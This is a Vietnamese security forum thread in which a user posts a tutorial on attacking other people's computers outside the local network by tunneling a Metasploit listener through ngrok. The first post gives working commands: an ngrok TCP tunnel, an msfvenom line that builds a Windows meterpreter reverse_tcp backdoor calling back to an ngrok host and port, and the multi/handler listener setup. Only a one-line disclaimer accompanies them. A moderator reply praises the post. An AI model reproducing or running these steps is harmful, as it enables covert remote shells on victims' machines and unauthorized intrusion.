Sử dụng metasploit và ngrok tấn công máy tính người khác ngoài mạng LAN

Thảo luận trong 'Audit/Pentest Security' bắt đầu bởi DdosFulzac, 08/09/19, 07:09 AM.

  1. DdosFulzac

    DdosFulzac Member

    Tham gia: 25/07/18, 07:07 PM
    Bài viết: 21
    Đã được thích: 10
    Điểm thành tích:
    3
    [​IMG]
    Ta đã Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service.Nhưng đa số ta sử dụng metasploit để thực hành tấn công trong mạng LAN chứ sử dụng nó tấn công máy tính người khác ngoài mạng LAN.Hôm nay sẽ hướng dẫn cho các bạn sử dụng combo Metasploit và Ngrok để tấn công máy tính ngoài mạng LAN.Do bài mang tính chất nguy hiểm nên khuyên các bạn không áp dụng vào mục đích xấu.
    1.Ngrok: chạy lệnh ngrok tcp port
    -Nếu bạn nào chưa cài ngrok => bấm vô đây hướng dẫn chi tiết
    -Ở đây mình dùng port 8080: ngrok tcp 8080
    [​IMG]

    2.Metasploit: ta sẽ dùng để file backdoor và để có thể tạo lắng nghe kết nối từ phía nạn nhân
    -Tạo backdoor ta sử dụng:
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=custom domain ngrok LPORT= port của ngrok
    + -a x86: là máy tính có kiến trúc 32 bit , --platform windows: máy tính chạy trên hệ điều hành windows
    + Ở đây mình dùng payload: windows/meterpreter/reverse_tcp
    [​IMG]

    +LHOST:0.tcp.ngrok.io
    +LPORT:11490
    -Sau khi tạo backdoor xong
    -Mở metasploit và làm các bước sau:
    +msfconsole
    +use multi/handler
    +set payload windows/meterpreter/reverse_tcp
    +set lhost localhost
    +set lport 8080
    +exploit
    Video hướng dẫn chi tiết
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. krone

    krone Moderator Thành viên BQT

    Tham gia: 26/07/16, 03:07 PM
    Bài viết: 260
    Đã được thích: 137
    Điểm thành tích:
    43
    Bài viết khá ổn, nếu bạn có thể phân tích chi tiết hơn 1 chút thì okie ^^
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    DdosFulzac thích bài này.
  3. DdosFulzac

    DdosFulzac Member

    Tham gia: 25/07/18, 07:07 PM
    Bài viết: 21
    Đã được thích: 10
    Điểm thành tích:
    3
    Cảm ơn Mod đã góp ý cho mình sẽ cố gắng phân tích nhiều hơn
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan